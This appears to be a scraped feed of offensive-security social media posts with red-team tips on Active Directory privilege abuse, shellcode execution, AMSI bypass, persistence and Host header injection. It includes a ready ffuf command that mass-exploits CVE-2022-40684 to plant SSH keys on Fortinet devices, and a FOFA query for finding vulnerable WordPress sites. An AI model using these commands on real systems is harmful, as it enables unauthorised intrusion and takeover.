If attacker is able to manipulate the ACL for AdminSDHolder, then those ACL will automatically be applied to all protected objects. #cybersecurity #infosec #pentesting #redteam #windows #activedirectory

Adversaries may leverage the Windows CreateThread function from Kernel32.dll to execute a malicious code within the virtual address space of the calling process. cyberkhalid.github.io/posts/createth… #cybersecurity #infosec #redteam #windows

If we can change the configuration of a service, and at thesame time we can stop/start the service , then we can achieve Privilege Escalation if the service runs with a higher privileges. cyberkhalid.github.io/posts/winprivs… #cybersecurity #infosec #redteam #windows

Once you got root access on any host, you can add any scheduled task. You could even just configure a task where every minute a reverse shell is sent to you. cyberkhalid.github.io/posts/pcron/ #redteam #cybersecurity #infosec

Everywhere #uber Good luck #dfir #csirt # bleepingcomputer.com/news/security/…

Since AmsiScanBuffer() function is responsible for checking the inputs for malicious content, We can modify the function to always return 0 regardless of whether or not the input is malicious. Since returning 0 simply means the function successfully scanned the inputs.

Pass the Ticket(Ptt) is a credential theft technique that enables adversaries to use stolen Kerberos tickets to authenticate to resources (e.g., file shares and other computers) as a user without having to compromise that user’s password. cyberkhalid.github.io/posts/ptt/ #cybersecurity

If the server implicitly trusts the Host header, and fails to validate or escape it properly, an attacker may be able to use this input to inject harmful payloads that manipulate server-side behavior. This could lead to authentication bypass. cyberkhalid.github.io/posts/hheada/ #infosec

CVE-2022-40684 ffuf -w "host_list.txt:URL" -u "https://URL/api/v2/cmdb/system/admin/admin" -X PUT -H 'User-Agent: Report Runner' -H 'Content-Type: application/json' -H 'Forwarded: for="[127.0.0.1]:8000";by=”[127.0.0.1]:9000";' -d '{"ssh-public-key1": "h4x0r"}' -mr "SSH" -r

Malware can use CreateThread() function from kernel32.dll library to execute a shellcode. #cybersecurity #infosec #offsec #redteaming #pentesting #windows

CVE-2022-42983 anji-plus AJ-Report 0.9.8.6 allows remote attackers to bypass login authentication by spoofing JWT Tokens. cve.mitre.org/cgi-bin/cvenam…

Shellcode will be executed by calling EnumPageFilesW() function with the pCallBackRoutine parameter set to the base address of the shellcode. #cybersecurity #infosec #redteaming #pentesting

This is possible because any machine account with SERVER_TRUST_ACCOUNT flag set will have the Replications right. cyberkhalid.github.io/posts/machuser/

The path is clear -> If you have GenericAll on a group, you can add yourself to the group -> If you have WriteDacl on a domain, You can execute Dcsync Attack to retrieve Account hashes. ->If you have hashes, you can execute Pass-The-Hash attack to gain access Simple #infosec

Another hit🔥 Tips: After removing the invited user, try to use the invitation link sent to the user. #bugbountytips #hackerone #infosec

-> Establish persistence using schtasks. -> This will create a scheduled task to spawn backdoor.exe at 11:30. #infosec #cybersecuritytips #redteam

Platforms To Learn Cybersecurity #Cybersecurity #infosec #education #Hacked #Hacking #BugBounty

#CVE-2023-2982 #WordPress Social Login and Register authentication bypass🚩 FOFA Query: body="/wp-content/plugins/miniorange-login-openid" Link: enbeta.fofa.info/result?qbase64… Refer: lana.codes/lanavdb/2326f4… #cybersecurity #infosec #OSINT #FOFA #ThreatIntelligence

The $5 Membership sale is now live! The sale lasts until July 17 23:59 UTC: account.shodan.io/billing/member

Defend your network with $70 off this cybersecurity course bundle bleepingcomputer.com/offer/deals/de… bleepingcomputer.com/offer/deals/de…